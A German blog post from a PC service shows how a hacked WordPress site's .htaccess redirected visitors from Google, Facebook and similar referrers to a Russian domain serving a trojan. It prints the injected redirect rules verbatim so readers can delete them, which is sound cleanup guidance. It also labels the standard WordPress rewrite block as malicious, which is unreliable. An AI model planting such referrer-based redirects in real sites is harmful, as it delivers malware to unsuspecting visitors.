Websiteentführung nach Hackerangriff auf WordPress

Nach einem Hackerangriff wurde unsere Webseite gezielt, bei vorherigem Besuch von verschiedenen anderen Seiten eingebettet z.B. google, ask.com, facebook, youtube.com und twitter.

Der Hacker hat die .htaccess Datei im Root-Verzeichnis des WordPress geändert so daß die Seite auf  timeconnection.ru/cfgen/index.php weiterleitet, wo ein JavaScript versucht, auf dem Betrachterrechner einen Virus einzurichten.  Laut Avira AntiVir handelt es sich sich um den Trojaner TR/Crypt.XPACK.Gen .

Um das zu beheben:

Öffnen Sie Ihre /.htaccess mit dem Texteditor.

Folgende Zeilen enthalten den Schadcode und sind zu löschen!!!!
Ändern Sie danach alle Kennwörter mit Zugriff auf Ihre Domains!!!

 Schadcode:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress 

 RewriteEngine On 
 ErrorDocument 400 http://timeconnection.ru/cfgen/index.php 
 ErrorDocument 401 http://timeconnection.ru/cfgen/index.php 
 ErrorDocument 403 http://timeconnection.ru/cfgen/index.php 
 ErrorDocument 404 http://timeconnection.ru/cfgen/index.php 
 ErrorDocument 500 http://timeconnection.ru/cfgen/index.php 
 RewriteCond %{HTTP_REFERER} .*google.* [OR] 
 RewriteCond %{HTTP_REFERER} .*ask.* [OR] 
 RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] 
 RewriteCond %{HTTP_REFERER} .*baidu.* [OR] 
 RewriteCond %{HTTP_REFERER} .*youtube.* [OR] 
 RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] 
 RewriteCond %{HTTP_REFERER} .*qq.* [OR] 
 RewriteCond %{HTTP_REFERER} .*excite.* [OR] 
 RewriteCond %{HTTP_REFERER} .*altavista.* [OR] 
 RewriteCond %{HTTP_REFERER} .*msn.* [OR] 
 RewriteCond %{HTTP_REFERER} .*netscape.* [OR] 
 RewriteCond %{HTTP_REFERER} .*aol.* [OR] 
 RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] 
 RewriteCond %{HTTP_REFERER} .*goto.* [OR] 
 RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] 
 RewriteCond %{HTTP_REFERER} .*mamma.* [OR] 
 RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] 
 RewriteCond %{HTTP_REFERER} .*lycos.* [OR] 
 RewriteCond %{HTTP_REFERER} .*search.* [OR] 
 RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] 
 RewriteCond %{HTTP_REFERER} .*bing.* [OR] 
 RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] 
 RewriteCond %{HTTP_REFERER} .*facebook.* [OR] 
 RewriteCond %{HTTP_REFERER} .*twitter.* [OR] 
 RewriteCond %{HTTP_REFERER} .*blog.* [OR] 
 RewriteCond %{HTTP_REFERER} .*live.* [OR] 
 RewriteCond %{HTTP_REFERER} .*myspace.* [OR] 
 RewriteCond %{HTTP_REFERER} .*mail.* [OR] 
 RewriteCond %{HTTP_REFERER} .*yandex.* [OR] 
 RewriteCond %{HTTP_REFERER} .*rambler.* [OR] 
 RewriteCond %{HTTP_REFERER} .*ya.* [OR] 
 RewriteCond %{HTTP_REFERER} .*aport.* [OR] 
 RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] 
 RewriteCond %{HTTP_REFERER} .*flickr.* 
 RewriteRule ^(.*)$ http://timeconnection.ru/cfgen/index.php [R=301,L] 

Löschen Sie diesen Code!!!

 

Armin Fischer
AFD-PC-SERVICE.de Armin Fischer

Armin Fischer
info@arminfischer.de
+4917621008967

 

 

Print Friendly, PDF & Email

Ein Kommentar

  1. Pingback: Bundesamt für Sicherheit in der Informationstechnik (BSI) empfiehlt Java zu deinstallieren « AFD PC-SERVICE Armin Fischer, Regensburg . www.afd-pc-service.de .

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Translate »
Quick Box - Popup Notification Box Powered By : XYZScripts.com

Durch die weitere Nutzung der Seite stimmst du der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn du diese Website ohne Änderung der Cookie-Einstellungen verwendest oder auf "Akzeptieren" klickst, erklärst du sich damit einverstanden.

Schließen